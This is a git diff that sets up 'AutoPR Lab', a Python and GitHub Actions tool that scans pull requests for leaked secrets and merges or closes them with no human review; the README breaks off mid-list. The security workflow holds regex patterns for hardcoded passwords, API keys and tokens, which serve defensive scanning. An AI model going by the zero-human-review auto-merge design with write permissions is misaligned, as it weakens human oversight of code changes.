diff --git a/.dockerignore b/.dockerignore
new file mode 100644
index 0000000..9d044b2
--- /dev/null
+++ b/.dockerignore
@@ -0,0 +1,37 @@
+# Git and version control
+.git
+.github
+.gitignore
+
+# Python artifacts
+__pycache__/
+*.py[cod]
+*$py.class
+.pytest_cache/
+.mypy_cache/
+.ruff_cache/
+.venv/
+venv/
+ENV/
+build/
+dist/
+*.egg-info/
+
+# Coverage and reports
+.coverage
+htmlcov/
+nosetests.xml
+coverage.xml
+*.lcov
+safety-report.json
+bandit-report.json
+scan_result.json
+security-scan.json
+
+# IDEs
+.vscode/
+.idea/
+
+# OS files
+.DS_Store
+Thumbs.db
diff --git a/.github/workflows/auto-pr.yml b/.github/workflows/auto-pr.yml
new file mode 100644
index 0000000..f5f697b
--- /dev/null
+++ b/.github/workflows/auto-pr.yml
@@ -0,0 +1,150 @@
+name: "🤖 AutoPR Lab — Automated PR Review"
+
+# ─────────────────────────────────────────────────────────────────────────────
+# This workflow runs on every Pull Request and takes an automatic decision:
+# - ✅ MERGE: the PR passes every security analysis
+# - ⚠️ WARN MERGE: there are only non-critical warnings
+# - ❌ REJECT: there are critical errors or security violations
+# ─────────────────────────────────────────────────────────────────────────────
+
+on:
+  pull_request:
+    types: [opened, synchronize, reopened]
+    # Optional filter: only trigger for certain paths
+    # paths:
+    #   - "detectors/**"
+    #   - "tests/**"
+    #   - "docs/**"
+
+# Cancel earlier runs for the same PR when a new push arrives
+concurrency:
+  group: autopr-${{ github.event.pull_request.number }}
+  cancel-in-progress: true
+
+jobs:
+  autopr-analysis:
+    name: "🔍 Security & Quality Analysis"
+    runs-on: ubuntu-latest
+    timeout-minutes: 10
+
+    # Explicit permissions — principle of least privilege
+    permissions:
+      contents: write  # Needed to merge
+      pull-requests: write  # Needed to comment on, approve and close PRs
+      issues: write  # Needed to add labels
+
+    steps:
+      # ── 1. Repository checkout ──────────────────────────────────
+      - name: "📥 Checkout Repository"
+        uses: actions/checkout@v5
+        with:
+          fetch-depth: 0  # Full history is needed to compare branches
+
+      # ── 2. Setup Python ──────────────────────────────────────────────
+      - name: "🐍 Setup Python 3.13"
+        uses: actions/setup-python@v5
+        with:
+          python-version: "3.13"
+          cache: "pip"
+
+      # ── 3. Install dependencies ─────────────────────────────────────
+      - name: "📦 Install Dependencies"
+        run: |
+          python -m pip install --upgrade pip
+          pip install -r requirements.txt
+
+      # ── 4. Pre-flight security check ────────────────────────────
+      - name: "🛡️ Pre-flight Security Check"
+        env:  # PR-controlled text goes through env vars; inlining ${{ }} in the script allows shell injection
+          PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
+          PR_BASE_REF: ${{ github.event.pull_request.base.ref }}
+          PR_HEAD_REF: ${{ github.event.pull_request.head.ref }}
+          PR_HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
+        run: |
+          echo "PR Author: $PR_AUTHOR"
+          echo "PR Title: $PR_TITLE"
+          echo "Base Branch: $PR_BASE_REF"
+          echo "Head Branch: $PR_HEAD_REF"
+          echo "Changed Files Count: ${{ github.event.pull_request.changed_files }}"
+          echo "Additions: ${{ github.event.pull_request.additions }}"
+          echo "Deletions: ${{ github.event.pull_request.deletions }}"
+
+          # Print base and head repositories so a fork PR is easy to spot (nothing is validated here)
+          # For private repos these two lines can be removed
+          echo "Repository: ${{ github.repository }}"
+          echo "Head Repository: $PR_HEAD_REPO"
+
+      # ── 5. Run the Decision Engine ───────────────────────────────────
+      - name: "🤖 Run AutoPR Decision Engine"
+        id: autopr
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          GITHUB_REPOSITORY: ${{ github.repository }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          LOG_LEVEL: "INFO"
+          SCAN_OUTPUT: "scan_result.json"
+          # Set DRY_RUN=true to test without performing real actions
+          # DRY_RUN: "true"
+        run: |
+          python scripts/decision_engine.py
+
+      # ── 6. 
Publicar resultado como artefacto ───────────────────────── + - name: "📊 Upload Scan Results" + if: always() + uses: actions/upload-artifact@v4 + with: + name: "scan-results-pr-${{ github.event.pull_request.number }}" + path: scan_result.json + retention-days: 30 + + # ── 7. Summary del workflow ─────────────────────────────────────── + - name: "📋 Generate Workflow Summary" + if: always() + run: | + if [ -f scan_result.json ]; then + DECISION=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('decision','UNKNOWN'))") + STATUS=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('global_status','UNKNOWN'))") + ERRORS=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('errors',0))") + WARNINGS=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('warnings',0))") + FILES=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('files_analyzed',0))") + + cat >> $GITHUB_STEP_SUMMARY << EOF + ## 🤖 AutoPR Lab — PR #${{ github.event.pull_request.number }} + + | Campo | Valor | + |-------|-------| + | Decisión | \`${DECISION}\` | + | Estado | \`${STATUS}\` | + | Errores | \`${ERRORS}\` | + | Advertencias | \`${WARNINGS}\` | + | Archivos analizados | \`${FILES}\` | + + EOF + + if [ "$DECISION" = "MERGE" ]; then + echo "### ✅ PR mergeado automáticamente" >> $GITHUB_STEP_SUMMARY + elif [ "$DECISION" = "WARN_MERGE" ]; then + echo "### ⚠️ PR mergeado con advertencias" >> $GITHUB_STEP_SUMMARY + elif [ "$DECISION" = "REJECT" ]; then + echo "### ❌ PR rechazado y cerrado" >> $GITHUB_STEP_SUMMARY + fi + else + echo "## ⚠️ No se generó resultado de análisis" >> $GITHUB_STEP_SUMMARY + fi + + # ── 8. 
Fallar el job si el PR fue rechazado ─────────────────────── + # (El script ya devuelve exit code 1 en REJECT, pero esto es explícito) + - name: "🚦 Check Final Decision" + if: always() + run: | + if [ -f scan_result.json ]; then + DECISION=$(python -c "import json; d=json.load(open('scan_result.json')); print(d.get('decision','UNKNOWN'))") + if [ "$DECISION" = "REJECT" ]; then + echo "❌ PR fue rechazado por AutoPR Lab" + exit 1 + elif [ "$DECISION" = "MERGE" ] || [ "$DECISION" = "WARN_MERGE" ]; then + echo "✅ PR fue procesado exitosamente: ${DECISION}" + exit 0 + fi + fi diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml new file mode 100644 index 0000000..5abb21f --- /dev/null +++ b/.github/workflows/security.yml @@ -0,0 +1,241 @@ +name: "🔒 Security Scan" + +# ───────────────────────────────────────────────────────────────────────────── +# Workflow de escaneo de seguridad periódico y bajo demanda +# Se ejecuta automáticamente cada lunes a las 2am UTC y puede ser disparado manualmente +# ───────────────────────────────────────────────────────────────────────────── + +on: + schedule: + - cron: "0 2 * * 1" # Lunes 2am UTC + workflow_dispatch: + inputs: + scan_type: + description: 'Tipo de escaneo' + required: false + default: 'full' + type: choice + options: + - basic + - full + +jobs: + security-scan: + name: "🛡️ Security Vulnerability Scan" + runs-on: ubuntu-latest + timeout-minutes: 15 + + # Permisos mínimos necesarios + permissions: + contents: read # Leer el repositorio + actions: read # Leer workflows + security-events: write # Crear alerts de seguridad (opcional) + + steps: + # ── 1. Checkout del repositorio ────────────────────────────────── + - name: "📥 Checkout Repository" + uses: actions/checkout@v5 + + # ── 2. Setup Python ────────────────────────────────────────────── + - name: "🐍 Setup Python 3.13" + uses: actions/setup-python@v5 + with: + python-version: "3.13" + cache: "pip" + + # ── 3. 
Install security tools ────────────────────────
+      - name: "📦 Install Security Tools"
+        run: |
+          python -m pip install --upgrade pip
+          pip install "safety>=3.0.0" "bandit>=1.7.0"  # quoted: a bare ">=" is parsed by the shell as a redirection
+
+      # ── 4. Safety scan (dependency vulnerabilities) ─────
+      - name: "🔍 Safety Scan - Dependencies Vulnerabilities"
+        id: safety
+        run: |
+          echo "🔒 Escaneando vulnerabilidades en dependencias..."
+
+          # Create a placeholder requirements file if none exists
+          if [ ! -f requirements.txt ]; then
+            echo "# AutoPR Lab - Dependencies" > requirements.txt
+            echo "# Solo usa módulos de la biblioteca estándar de Python 3.10+" >> requirements.txt
+          fi
+
+          # Run the safety scan ("|| true": a non-zero exit must not abort the step)
+          python -m safety scan --json --output safety-report.json || true
+
+          # Extract the summary (the inline Python stays at the block's base indent; column-0 lines would end the YAML scalar)
+          if [ -f safety-report.json ]; then
+            VULNS=$(python -c "
+          import json
+          try:
+              with open('safety-report.json', 'r') as f:
+                  data = json.load(f)
+              vulns = len(data.get('vulnerabilities', []))
+              print(vulns)
+          except Exception:
+              print('0')
+          ")
+            echo "vulnerabilities_found=$VULNS" >> $GITHUB_OUTPUT
+            echo "📊 Vulnerabilidades encontradas: $VULNS"
+          else
+            echo "vulnerabilities_found=0" >> $GITHUB_OUTPUT
+          fi
+
+      # ── 5. Bandit scan (static code analysis) ─────────────
+      - name: "🔍 Bandit Scan - Static Code Analysis"
+        id: bandit
+        run: |
+          echo "🔍 Analizando código fuente en busca de problemas de seguridad..."
+
+          # Run the bandit scan
+          python -m bandit -r . 
-f json -o bandit-report.json || true
+
+          # Extract the summary (the inline Python stays at the block's base indent; column-0 lines would end the YAML scalar)
+          if [ -f bandit-report.json ]; then
+            ISSUES=$(python -c "
+          import json
+          try:
+              with open('bandit-report.json', 'r') as f:
+                  data = json.load(f)
+              issues = len(data.get('results', []))
+              high_medium = len([r for r in data.get('results', []) if r.get('issue_severity') in ['HIGH', 'MEDIUM']])
+              print(f'{issues}:{high_medium}')
+          except Exception:
+              print('0:0')
+          ")
+            TOTAL_ISSUES=$(echo $ISSUES | cut -d':' -f1)
+            HIGH_MEDIUM=$(echo $ISSUES | cut -d':' -f2)
+
+            echo "total_issues=$TOTAL_ISSUES" >> $GITHUB_OUTPUT
+            echo "high_medium_issues=$HIGH_MEDIUM" >> $GITHUB_OUTPUT
+            echo "📊 Problemas de seguridad encontrados: $TOTAL_ISSUES ($HIGH_MEDIUM altos/medios)"
+          else
+            echo "total_issues=0" >> $GITHUB_OUTPUT
+            echo "high_medium_issues=0" >> $GITHUB_OUTPUT
+          fi
+
+      # ── 6. Secret scan (optional) ───────────────────────────────
+      - name: "🔍 Secret Scan - Basic Pattern Detection"
+        id: secrets
+        run: |
+          echo "🔍 Buscando patrones de secretos comunes..."
+
+          # Basic secret patterns
+          PATTERNS=(
+            "password\s*=\s*['\"][^'\"]+['\"]"
+            "api[_-]?key\s*=\s*['\"][^'\"]+['\"]"
+            "secret[_-]?key\s*=\s*['\"][^'\"]+['\"]"
+            "token\s*=\s*['\"][^'\"]{20,}['\"]"
+            "sk-[a-zA-Z0-9]{48}"
+          )
+
+          SECRETS_FOUND=0
+          for pattern in "${PATTERNS[@]}"; do
+            if grep -r -E --include="*.py" --include="*.yml" --include="*.yaml" --include="*.json" --include="*.md" "$pattern" .; then
+              SECRETS_FOUND=$((SECRETS_FOUND + 1))  # not ((x++)): it returns status 1 when x is 0 and aborts the step under "bash -e"
+            fi
+          done
+
+          echo "secrets_found=$SECRETS_FOUND" >> $GITHUB_OUTPUT
+          echo "📊 Posibles secretos encontrados: $SECRETS_FOUND"
+
+      # ── 7. 
Build the consolidated report ───────────────────────────────────
+      - name: "📊 Generate Security Report"
+        run: |
+          cat << EOF > security-summary.md  # delimiter left unquoted so the date command substitution below is expanded
+          # 🔒 AutoPR Lab - Security Scan Report
+
+          ## 📊 Resumen Ejecutivo
+
+          | Métrica | Resultado |
+          |---------|-----------|
+          | Vulnerabilidades en dependencias | ${{ steps.safety.outputs.vulnerabilities_found }} |
+          | Problemas de código (total) | ${{ steps.bandit.outputs.total_issues }} |
+          | Problemas altos/medios | ${{ steps.bandit.outputs.high_medium_issues }} |
+          | Posibles secretos | ${{ steps.secrets.outputs.secrets_found }} |
+
+          ## 🕐 Fecha del Escaneo
+          $(date -u +"%Y-%m-%d %H:%M:%S UTC")
+
+          ## 📋 Detalles
+
+          ### Dependencias
+          - **Safety**: Escaneo completado
+          - **Reporte**: [safety-report.json](safety-report.json)
+
+          ### Código Fuente
+          - **Bandit**: Análisis estático completado
+          - **Reporte**: [bandit-report.json](bandit-report.json)
+
+          ### Secretos
+          - **Pattern Detection**: Escaneo básico completado
+          - **Método**: Búsqueda de patrones comunes
+
+          ---
+          *Generado automáticamente por AutoPR Lab Security Workflow*
+          EOF
+
+          echo "📄 Reporte de seguridad generado: security-summary.md"
+
+      # ── 8. Upload artifacts ───────────────────────────────────────────
+      - name: "📦 Upload Security Reports"
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: "security-scan-${{ github.run_number }}"
+          path: |
+            safety-report.json
+            bandit-report.json
+            security-summary.md
+          retention-days: 90
+
+      # ── 9. 
Publicar summary en GitHub ───────────────────────────────── + - name: "📋 Publish Security Summary" + if: always() + run: | + cat security-summary.md >> $GITHUB_STEP_SUMMARY + echo "" + echo "## 🚦 Estado General" + + VULNS="${{ steps.safety.outputs.vulnerabilities_found }}" + HIGH_ISSUES="${{ steps.bandit.outputs.high_medium_issues }}" + SECRETS="${{ steps.secrets.outputs.secrets_found }}" + + if [ "$VULNS" -eq 0 ] && [ "$HIGH_ISSUES" -eq 0 ] && [ "$SECRETS" -eq 0 ]; then + echo "### ✅ Sin problemas críticos detectados" + else + echo "### ⚠️ Se encontraron problemas que requieren atención" + if [ "$VULNS" -gt 0 ]; then + echo "- 🔴 $VULNS vulnerabilidades en dependencias" + fi + if [ "$HIGH_ISSUES" -gt 0 ]; then + echo "- 🟡 $HIGH_ISSUES problemas de seguridad en el código" + fi + if [ "$SECRETS" -gt 0 ]; then + echo "- 🔴 $SECRETS posibles secretos expuestos" + fi + fi + + # ── 10. Verificación crítica (fallar si hay problemas graves) ──────── + - name: "🚦 Critical Security Check" + if: always() + run: | + VULNS="${{ steps.safety.outputs.vulnerabilities_found }}" + HIGH_ISSUES="${{ steps.bandit.outputs.high_medium_issues }}" + SECRETS="${{ steps.secrets.outputs.secrets_found }}" + + # Considerar crítico: vulnerabilidades conocidas o secretos expuestos + if [ "$VULNS" -gt 0 ] || [ "$SECRETS" -gt 0 ]; then + echo "❌ Se detectaron problemas críticos de seguridad" + echo "📊 Vulnerabilidades: $VULNS" + echo "📊 Secretos: $SECRETS" + exit 1 + elif [ "$HIGH_ISSUES" -gt 5 ]; then + echo "⚠️ Se detectaron múltiples problemas de seguridad" + echo "📊 Problemas altos/medios: $HIGH_ISSUES" + exit 1 + else + echo "✅ No se detectaron problemas críticos de seguridad" + exit 0 + fi diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..93b4335 --- /dev/null +++ b/.gitignore @@ -0,0 +1,181 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ 
+downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +.python-version + +# pipenv +Pipfile.lock + +# poetry +poetry.lock + +# pdm +.pdm.toml + +# PEP 582 +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +.idea/ + +# VS Code +.vscode/ +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +!.vscode/*.code-snippets + +# Local History for Visual Studio Code +.history/ + +# Built Visual Studio Code Extensions +*.vsix + +# OS-specific +.DS_Store +.DS_Store? 
+._* +.Spotlight-V100 +.Trashes +ehthumbs.db +Thumbs.db + +# AutoPR Lab specific +scan_result.json +*.log +safety-report.json +security-scan.json +artifacts/ + +# Temporary files +*.tmp +*.temp +*.swp +*.swo +*~ + +# Backup files +*.bak +*.backup +*.orig diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml new file mode 100644 index 0000000..410763f --- /dev/null +++ b/.pre-commit-config.yaml @@ -0,0 +1,27 @@ +# Pre-commit configuration for AutoPR-Lab +# See https://pre-commit.com for more information +# See https://pre-commit.com/hooks.html for more hooks + +repos: + - repo: https://github.com/pre-commit/pre-commit-hooks + rev: v4.6.0 + hooks: + - id: trailing-whitespace + - id: end-of-file-fixer + - id: check-yaml + - id: check-added-large-files + - id: check-toml + + - repo: https://github.com/astral-sh/ruff-pre-commit + rev: v0.9.9 + hooks: + - id: ruff + args: [--fix, --exit-non-zero-on-fix] + - id: ruff-format + + - repo: https://github.com/pre-commit/mirrors-mypy + rev: v1.11.2 + hooks: + - id: mypy + additional_dependencies: [types-requests, types-setuptools] + args: [--strict, --ignore-missing-imports] diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..213fdb0 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,33 @@ +# Use high performance, lightweight Python 3.13 image +FROM python:3.13-slim-bookworm + +# Metadata +LABEL maintainer="AutoPR Lab Team" +LABEL version="1.0" +LABEL description="AutoPR Lab Decision Engine" + +# Environment variables +ENV PYTHONUNBUFFERED=1 \ + PYTHONDONTWRITEBYTECODE=1 \ + PIP_NO_CACHE_DIR=off \ + PIP_DISABLE_PIP_VERSION_CHECK=on \ + PIP_DEFAULT_TIMEOUT=100 + +# Set working directory +WORKDIR /app + +# Copy dependency files +COPY pyproject.toml requirements.txt ./ + +# Install the package and its dependencies +RUN pip install --upgrade pip && \ + pip install . + +# Copy the rest of the application +COPY . . 
+
+# Put the application root on the module search path (PYTHONPATH, not PATH); nothing earlier in this file defines PYTHONPATH, so there is no value to append
+ENV PYTHONPATH="/app"
+
+# Define the default entrypoint
+ENTRYPOINT ["python", "scripts/decision_engine.py"]
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..73ec295
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,114 @@
+.PHONY: help install install-dev test lint format clean security-check security-scan run-example validate-detectors setup pre-commit dev outdated update
+
+# Default target
+help:
+	@echo "AutoPR Lab - Makefile"
+	@echo "====================="
+	@echo ""
+	@echo "Disponibles:"
+	@echo " install - Instalar el paquete en modo edición"
+	@echo " install-dev - Instalar dependencias de desarrollo"
+	@echo " test - Ejecutar tests con cobertura"
+	@echo " lint - Ejecutar linting (ruff + mypy)"
+	@echo " format - Formatear código con ruff"
+	@echo " clean - Limpiar archivos temporales"
+	@echo " security-check- Escaneo de seguridad básico"
+	@echo " security-scan - Escaneo de seguridad completo"
+	@echo " run-example - Ejecutar ejemplo del decision engine"
+	@echo " validate-detectors - Validar estructura de detectores"
+	@echo ""
+
+# Install package in development mode
+install:
+	pip install -e .
+
+# Install with development dependencies
+install-dev:
+	pip install -e ".[dev,security]"
+	@echo "✅ Dependencias de desarrollo instaladas"
+
+# Run tests with coverage
+test:
+	@echo "🧪 Ejecutando tests..."
+	python -m pytest tests/ -v --cov=. --cov-report=html --cov-report=term
+	@echo "✅ Tests completados. Ver reporte en htmlcov/index.html"
+
+# Linting with ruff and mypy
+lint:
+	@echo "🔍 Ejecutando linting..."
+	ruff check .
+	mypy .
+	@echo "✅ Linting completado"
+
+# Format code with ruff
+format:
+	@echo "📝 Formateando código..."
+	ruff format .
+	@echo "✅ Código formateado"
+
+# Clean temporary files and build artifacts (rm -rf for directories: find's -delete cannot remove non-empty ones)
+clean:
+	@echo "🧹 Limpiando archivos temporales..."
+	find . -type d -name __pycache__ -exec rm -rf {} + 2>/dev/null || true
+	find . -type f -name "*.pyc" -delete 2>/dev/null || true
+	find . 
-type f -name "*.pyo" -delete 2>/dev/null || true
+	find . -type d -name "*.egg-info" -exec rm -rf {} + 2>/dev/null || true
+	find . -type d -name "*.egg" -exec rm -rf {} + 2>/dev/null || true
+	rm -rf .coverage htmlcov/ .pytest_cache/ .mypy_cache/ .ruff_cache/
+	rm -rf build/ dist/
+	rm -f scan_result.json safety-report.json bandit-report.json security-scan.json
+	@echo "✅ Limpieza completada"
+
+# Basic security check
+security-check:
+	@echo "🔒 Ejecutando verificación de seguridad básica..."
+	python -m safety scan --short-report
+	@echo "✅ Verificación de seguridad completada"
+
+# Full security scan (writes safety-report.json and bandit-report.json; bandit's exit status is ignored)
+security-scan:
+	@echo "🛡️ Ejecutando escaneo de seguridad completo..."
+	python -m safety scan --json --output safety-report.json
+	python -m bandit -r . -f json -o bandit-report.json || true
+	@echo "✅ Escaneo de seguridad completado"
+	@echo "📊 Reportes generados: safety-report.json, bandit-report.json"
+
+# Run example with decision engine (always in DRY_RUN mode; requires the three variables checked below)
+run-example:
+	@echo "🤖 Ejecutando ejemplo del decision engine..."
+	@if [ -z "$(GITHUB_TOKEN)" ] || [ -z "$(GITHUB_REPOSITORY)" ] || [ -z "$(PR_NUMBER)" ]; then \
+		echo "❌ Se requieren variables de entorno:"; \
+		echo " GITHUB_TOKEN, GITHUB_REPOSITORY, PR_NUMBER"; \
+		echo " Ejemplo: make run-example GITHUB_TOKEN=xxx GITHUB_REPOSITORY=owner/repo PR_NUMBER=123"; \
+		exit 1; \
+	fi
+	export DRY_RUN="true" && python scripts/decision_engine.py
+
+# Validate all detectors
+validate-detectors:
+	@echo "🔍 Validando estructura de detectores..."
+	python scripts/validate_detectors.py
+
+# Development setup (install + validate)
+setup: install-dev validate-detectors
+	@echo "🚀 Entorno de desarrollo configurado"
+
+# Pre-commit checks (used by CI)
+pre-commit: lint test security-check
+	@echo "✅ Verificaciones pre-commit completadas"
+
+# Quick development cycle
+dev: format lint test
+	@echo "🔄 Ciclo de desarrollo completado"
+
+# Check for outdated dependencies
+outdated:
+	@echo "📦 Verificando dependencias desactualizadas..."
+ pip list --outdated + +# Update dependencies +update: + @echo "⬆️ Actualizando dependencias..." + pip install --upgrade pip setuptools wheel + pip install --upgrade -e ".[dev,security]" + @echo "✅ Dependencias actualizadas" diff --git a/README.md b/README.md index da14715..93f19d6 100644 --- a/README.md +++ b/README.md @@ -1,31 +1,293 @@ -# pull-shark-test +# 🤖 AutoPR Lab -Test 1 +> **Sistema de revisión y merge automático de Pull Requests con análisis de seguridad integrado.** +> Cero intervención humana. Reglas estrictas. Decisiones trazables. -Test 2 +[![GitHub Actions](https://img.shields.io/badge/GitHub_Actions-2088FF?style=flat&logo=github-actions&logoColor=white)](https://github.com/features/actions) +[![Python 3.10+](https://img.shields.io/badge/Python-3.10%2B-blue?logo=python)](https://python.org) +[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) +[![Security: Automated](https://img.shields.io/badge/Security-Automated-red)](docs/security.md) -Test 3 +--- -Test 4 +## ¿Qué es AutoPR Lab? -Test 5 +AutoPR Lab es un sistema de **revisión automática de Pull Requests** construido sobre GitHub Actions y Python. 
Analiza cada PR en tiempo real, ejecuta detectores de seguridad modulares, y toma una de tres decisiones sin intervención humana: -Test 6 +| Decisión | Condición | Acción | +|----------|-----------|--------| +| ✅ **MERGE** | Sin problemas | Aprueba + merge automático | +| ⚠️ **WARN MERGE** | Solo advertencias | Aprueba + merge + comentario | +| ❌ **REJECT** | Errores críticos | Comenta problemas + cierra PR | -Test 7 +--- -Test 8 +## 🏗️ Arquitectura del Proyecto -Test 9 +``` +AutoPR-Lab/ +│ +├── .github/ +│ └── workflows/ +│ └── auto-pr.yml # Workflow principal de GitHub Actions +│ +├── core/ +│ ├── __init__.py +│ └── scanner.py # Motor principal de análisis +│ +├── detectors/ +│ ├── __init__.py # Auto-descubrimiento de detectores +│ ├── base_detector.py # Clase base abstracta (contrato) +│ ├── api_keys_detector.py # Detecta API keys y tokens +│ ├── passwords_detector.py # Detecta passwords hardcodeados +│ ├── sensitive_files_detector.py # Detecta archivos sensibles +│ └── detector_validator.py # Valida estructura de detectores nuevos +│ +├── utils/ +│ ├── __init__.py +│ ├── github_api.py # Cliente de la GitHub REST API +│ ├── comment_templates.py # Templates para comentarios del bot +│ └── logger.py # Sistema de logging con colores +│ +├── scripts/ +│ └── decision_engine.py # Entry point: orquesta todo el flujo +│ +├── tests/ +│ ├── test_detectors.py # Tests unitarios de detectores +│ └── test_scanner.py # Tests de integración del scanner +│ +├── docs/ +│ ├── how-to-add-detector.md # Guía para contributors +│ └── example-outputs.md # Ejemplos de outputs del sistema +│ +├── examples/ +│ ├── valid-pr/ # Ejemplos de PRs que serán aceptados +│ └── invalid-pr/ # Ejemplos de PRs que serán rechazados +│ +└── requirements.txt # Dependencias (solo stdlib de Python) +``` -Test 10 +--- -Test 11 +## 🔍 Sistema de Detectores -Test 12 +Los detectores son módulos **independientes** que analizan el código y devuelven resultados estandarizados: -Test 13 +```python +@dataclass 
+class DetectorResult: + status: DetectorStatus # OK | WARNING | ERROR + detector_name: str + message: str + details: List[str] + file_path: Optional[str] + line_number: Optional[int] +``` -Test 14 +### Detectores incluidos -Test 15 +| Detector | Qué detecta | Severidad | +|----------|-------------|-----------| +| `APIKeysDetector` | GitHub tokens, OpenAI keys, AWS secrets, claves RSA, URLs con credenciales | 🔴 Critical | +| `PasswordsDetector` | Passwords hardcodeados, contraseñas triviales, tokens de autenticación | 🔴 Critical | +| `SensitiveFilesDetector` | `.env`, `.pem`, `.key`, `credentials.json`, archivos de BD | 🔴 Critical | +| `DetectorFormatValidator` | Estructura, imports prohibidos, `eval/exec`, herencia correcta | 🔴 Critical | + +--- + +## 🛡️ Reglas de Seguridad (Auto-Merge) + +El sistema solo permite merge automático cuando se cumplen **TODAS** estas condiciones: + +### ✅ Rutas permitidas para auto-merge +``` +detectors/ ← Nuevos detectores +tests/ ← Tests +docs/ ← Documentación +examples/ ← Ejemplos +README.md ← Readme principal +``` + +### 🚫 Rutas siempre bloqueadas +``` +core/ ← Motor principal (requiere revisión manual) +.github/workflows/ ← Workflows de CI/CD (crítico) +scripts/ ← Scripts de decisión +requirements.txt ← Dependencias +pyproject.toml ← Configuración del proyecto +Makefile ← Automatización +``` + +### 📏 Límites de tamaño +- Máximo **10 archivos** por PR +- Máximo **500 líneas** cambiadas + +--- + +## ⚡ Cómo Funciona (Flujo Completo) + +``` +PR Abierto/Actualizado + │ + ▼ +┌─────────────────────────────────┐ +│ GitHub Actions Trigger │ +│ on: pull_request │ +└─────────────┬───────────────────┘ + │ + ▼ +┌─────────────────────────────────┐ +│ decision_engine.py │ +│ - Lee variables de entorno │ +│ - Obtiene archivos del PR │ +└─────────────┬───────────────────┘ + │ + ▼ +┌─────────────────────────────────┐ +│ SecurityRules.validate_paths │ +│ - ¿Rutas permitidas? │ +│ - ¿Tamaño dentro de límites? 
│ +└─────────────┬───────────────────┘ + │ + ▼ +┌─────────────────────────────────┐ +│ Scanner.scan_pr │ +│ - Ejecuta TODOS los │ +│ detectores sobre cada │ +│ archivo del PR │ +└─────────────┬───────────────────┘ + │ + ┌─────────┼──────────┐ + ▼ ▼ ▼ + ERROR WARNING OK + │ │ │ + ▼ ▼ ▼ + REJECT WARN_MERGE MERGE + │ │ │ + ▼ ▼ ▼ +Comentar Aprobar Aprobar + + Cerrar + Merge + Merge + + Comentar +``` + +--- + +## 🚀 Instalación y Configuración + +### 1. Fork o clona el repositorio + +```bash +git clone https://github.com/devsebastian44/AutoPR-Lab.git +cd AutoPR-Lab +``` + +### 2. Habilitar GitHub Actions + +El workflow en `.github/workflows/auto-pr.yml` se activa automáticamente en cada PR. + +**No necesitas configurar nada adicional** — usa el `GITHUB_TOKEN` que GitHub provee automáticamente. + +### 3. Configurar permisos del repositorio + +En `Settings → Actions → General`: +- Marcar **"Read and write permissions"** para el GITHUB_TOKEN +- Marcar **"Allow GitHub Actions to create and approve pull requests"** + +### 4. Opcional: Ejecutar localmente + +```bash +# Instalar dependencias (solo para desarrollo) +pip install -r requirements.txt + +# Ejecutar tests +python -m pytest tests/ -v + +# Dry run (sin ejecutar acciones reales en GitHub) +export GITHUB_TOKEN="tu_token" +export GITHUB_REPOSITORY="owner/repo" +export PR_NUMBER="123" +export DRY_RUN="true" +python scripts/decision_engine.py +``` + +--- + +## 🔌 Agregar un Detector Nuevo + +1. Crea `/detectors/mi_detector.py` heredando de `BaseDetector` +2. Crea `/tests/test_mi_detector.py` con tests unitarios +3. 
